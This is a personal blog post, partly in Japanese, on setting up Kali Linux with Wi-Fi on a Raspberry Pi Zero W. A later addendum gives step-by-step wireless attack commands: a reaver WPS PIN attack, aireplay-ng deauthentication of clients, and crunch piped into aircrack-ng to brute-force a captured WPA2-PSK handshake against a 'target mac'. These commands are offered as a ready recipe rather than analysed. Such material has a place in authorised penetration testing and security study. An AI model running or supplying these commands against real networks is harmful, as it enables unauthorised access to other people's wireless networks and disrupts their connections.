Sep 18, 2017

raspi0w + kali linux + how to enable wi-fi card


raspberry pi 用のkali linuxダウンロードサイト

https://www.offensive-security.com/kali-linux-arm-images/

以下、built-in wi-fi device (wlan0)が認識されなかった時の、対応手順


1)i installed kali on the sd card.

2)put the sd card in another pi using a usb to microsd adapter
 別の起動済みraspbian(pi)環境に SDカードを挿入

3)Then mount the 2 partitons from the card under /mnt and /mnt/boot
 mount /dev/sda2 /mnt/
 mount /dev/sda1 /mnt/boot/

4)rpi-update the kali image
 ROOT_PATH=/mnt BOOT_PATH=/mnt/boot rpi-update

5)change root to the kali image
 chroot /mnt/ /bin/bash

6)update the thing
 apt-get update
 apt-get upgrade

7)install the wireless driver
 apt-get install firmware-brcm80211

 ※ 手元の環境で「404  Not Found」エラーだが、
   それでも結果的にはwlan0が動くようになった

8)copy /lib/firmware/brcm/brcmfmac43430-sdio.txt from a rasbian image to /lib/firmware/brcm/brcmfmac43430-sdio.txt on kali

9)edit /etc/network/interfaces
 auto wlan0
 iface wlan0 inet dhcp
 wpa-ssid "mysupercoolssidofdoom"
 wpa-psk "mysupercoolpasswordofdoom"

10)exit the chroot, umount the partitons and eject the card

「That will get you kali on the pi zero w with wireless networking. But i cannot get bluetooth to work, and i soooooooo want to use my bluetooth keyboard with it. Sorry about my formatting typing this on my phone.」
だそうです。

参考にしたところ

・Re: Kali Linux Raspberry Pi Zero W - bluetooth (03/18)
 https://www.raspberrypi.org/forums/viewtopic.php?t=177530#p1133241
 ほぼ、ここの、まるうつしです。

・How To Set Up Kali Linux on the New $10 Raspberry Pi Zero W (07/22)
 https://null-byte.wonderhowto.com/how-to/set-up-kali-linux-new-10-raspberry-pi-zero-w-0176819/
 興味深いので、後日読んでみたい

・Re4son-Kernel for Raspberry Pi 1/2/3/Zero/Zero W (09/01)
 https://whitedome.com.au/re4son/re4son-kernel/
 コンパイル済みのカーネルの配布サイト

-- 2018.05.01 追記 -->

Kali Tutorials


---

5 Steps Wi-Fi


1.airmon-ng
2.airmon-ng stop wlan0
3.airodump-ng    wlan0

|Information:
|
| BSSID (Basic Service Set Identification): the MAC address of access point
| Beacons: Number of announcements packets sent by the AP
| #Data: Number of captured data packets (if WEP, unique IV count), including data broadcast packets.
| #/s: Number of data packets per second measure over the last 10 seconds.
| MB: Maximum speed supported by the AP. If MB = 11, it's 802.11b, if MB = 22 it's 802.11b+ and higher rates are 802.11g.
| CIPHER: The cipher detected. TKIP is typically used with WPA and CCMP is typically used with WPA2.
| ESSID: Shows the wireless network name. The so-called “SSID”, which can be empty if SSID hiding is activated.

4.wash -i wlan0 -c "target channel" -C -s
  if the WPS Locked status is No, then we are ready to move to step 5.
5.reaver -i wlan0 -b "target mac" --fail-wait=360

---
breaking wpa2-psk (2016/02/21)

airodump-ng wlan0 --bssid "target mac" --channel "target channel" -w "target ap"

aireplay-ng --deauth 20 -a "target mac" wlan0: aireplay-ng --deauth 20 -a "target mac" wlan0

crunch 20 20 0123456789abcdefghijklmnopqrstuvwxyz | aircrack-ng -b "target mac" -x1 -y -w - "target ap".cap

WPA2 Brute Force
> ./crunch 8 8 1234567890abcdefghijklmnopqrstuvwxyz -t passw@@@| aircrack-ng -b  And Target BSSID

Aircrack can't take dictionary from stdin?
> echo mywpapassword | aircrack-ng -w - -e devnetwork /tmp/captures.cap

---
HowTo : Pause/Resume Aircrack-ng

where files are saved in the session? #234 (2015/03/29)
> /usr/local/etc/reaver/ or /etc/reaver/

reaver resume from certain pin nr. #233 (2015/03/29)


No comments: